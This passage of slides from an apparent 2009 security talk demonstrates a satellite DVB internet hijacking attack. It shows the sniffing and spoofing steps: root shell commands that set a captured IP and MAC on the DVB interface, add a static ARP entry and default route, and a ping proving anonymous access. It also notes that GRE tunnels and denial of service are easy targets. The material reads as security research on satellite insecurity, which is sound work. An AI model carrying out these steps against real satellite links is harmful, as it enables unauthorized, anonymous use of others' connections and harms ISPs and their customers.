■ This will be our IP! 



HTSNACBT Attack 



Configure Linux to use it 



[Screenshot: ARP table on eth2; addresses partly redacted in the original] 

We need our router's MAC 



HTSNACBT Attack 



Configure our DVB interface to receive this IP 
(I suppose that you have configured the PID...) 

The IP is the one we have selected, and from the 
ICMP scan capture we must take the sniffed 
destination MAC. 



HTSNACBT Attack 



[root@sathunter ~]# tshark -Vnr sat_captured.cap | less 
Frame 1 (54 bytes on wire, 54 bytes captured) 
    Arrival Time: Mar 25, 2009 01:58:47.220140000 
    [Time delta from previous captured frame: 0.000000000 seconds] 
    [Time delta from previous displayed frame: 0.000000000 seconds] 
    [Time since reference or first frame: 0.000000000 seconds] 
    Frame Number: 1 
    Frame Length: 54 bytes 
    Capture Length: 54 bytes 
    [Frame is marked: False] 
    [Protocols in frame: eth:ip:tcp] 
Ethernet II, Src: 00:00:00:00:00:00 (00:00:00:00:00:00), Dst: [redacted] 
    Destination: [redacted] 
        Address: [redacted] 
        = IG bit: Individual address (unicast) 
        = LG bit: Globally unique address (factory default) 
    Source: 00:00:00:00:00:00 (00:00:00:00:00:00) 
        Address: 00:00:00:00:00:00 (00:00:00:00:00:00) 
        = IG bit: Individual address (unicast) 
        = LG bit: Globally unique address (factory default) 
    Type: IP (0x0800) 
Internet Protocol, Src: [redacted], Dst: [redacted] 
    Version: 4 
    Header length: 20 bytes 
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 
        0000 00.. = Differentiated Services Codepoint: Default (0x00) 
        .... ..0. = ECN-Capable Transport (ECT): 0 
        .... ...0 = ECN-CE: 0 
    Total Length: 40 
    Identification: 0x9cb4 (40116) 
    Flags: 0x00 
        0... = Reserved bit: Not set 

[Callout on the Destination line: Here we get the MAC 
address we must configure 
in our DVB interface] 



HTSNACBT Attack 



[root@sathunter ~]# ifconfig dvb0[...] [redacted IP] netmask 255.255.255.255 hw ether [redacted MAC] 
[root@sathunter ~]# 

I use netmask /32 to avoid routing problems 



HTSNACBT Attack 



Now we can configure our Internet interface 
with the same IP and configure a default 
route through a false router, giving that router 
a static MAC (our real router's MAC). 



HTSNACBT Attack 



[root@sathunter ~]# ifconfig eth2 [redacted IP] netmask 255.255.255.252 
[root@sathunter ~]# route add default gw [redacted]74 dev eth2 
[root@sathunter ~]# arp -s [redacted]74 00:05:[redacted] 
[root@sathunter ~]# 



HTSNACBT Attack 



IT WORKS! 



[root@sathunter ~]# ping www.nsa.gov 
PING www.nsa.gov (12.110.110.204) 56(84) bytes of data. 

--- www.nsa.gov ping statistics --- 
4 packets transmitted, 0 received, 100% packet loss, time 2999ms 
[root@sathunter ~]# ping www.google.es 
PING www.l.google.com (209.85.229.99) 56(84) bytes of data. 
64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=1 ttl=237 time=69.0 ms 
64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=2 ttl=237 time=59.6 ms 

--- www.l.google.com ping statistics --- 
2 packets transmitted, 2 received, 0% packet loss, time 1000ms 
rtt min/avg/max/mdev = 59.635/64.360/69.036/4.632 ms 
[root@sathunter ~]# 



HTSNACBT Attack 



That is all!!! 

Some things you must remember: 

The DNS server must allow requests from any 
IP or you must use the satellite ISP DNS 
server. 



HTSNACBT Attack 



If you have any firewall (iptables), disable it. 

Everything you do can be sniffed by 
other users. 



HTSNACBT Attack 



Now attacking GRE is very easy: you only 
need to configure your Linux with the IP of one of 
the routers (the one with the satellite 
connection) and configure the tunneling. 

http://www.google.es/search?rlz=iCiGPEA en ES^i2&sourceid=chrome&ie=UTF-8&q=configuring+GRE+linux 



What TO DO now? 



■ I'm studying the different methods to trace 

illegal users. (I only have a few ideas). 

■ In the future I would like to study the 
possibilities of sending data to a satellite via 
Astromodem (DVB-RCS). 



Conclusions 



■ Satellite communications are insecure. 

■ It can be sniffed. 

■ A lot of attacks can be made; I talked 
about only a few level 4 and level 3 attacks. 



Conclusions 



■ With this technology in our sky, an 
anonymous connection is possible. 

■ Many kinds of Denial of Service are possible. 



THANK YOU!!! 

Questions time 



